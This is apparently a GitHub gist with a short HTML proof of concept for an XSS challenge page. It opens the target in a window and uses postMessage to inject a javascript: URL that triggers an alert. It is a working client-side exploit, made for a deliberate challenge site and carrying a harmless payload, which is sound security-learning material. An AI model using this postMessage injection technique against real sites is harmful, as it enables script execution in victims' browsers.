Skip to content

Instantly share code, notes, and snippets.

@MohamedTarekq
Last active May 23, 2022 07:38
Show Gist options
  • Save MohamedTarekq/e992c8d7f54583ef00b60fa72c5f5708 to your computer and use it in GitHub Desktop.
Save MohamedTarekq/e992c8d7f54583ef00b60fa72c5f5708 to your computer and use it in GitHub Desktop.
<html>
<body >
<script >
var w = window.open("https://demo.honoki.net/xss-challenge.html");
setTimeout(function(){
w.postMessage('{"goto":"javascript:alert(`hello from timooon`)"}','*');
},2000);
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment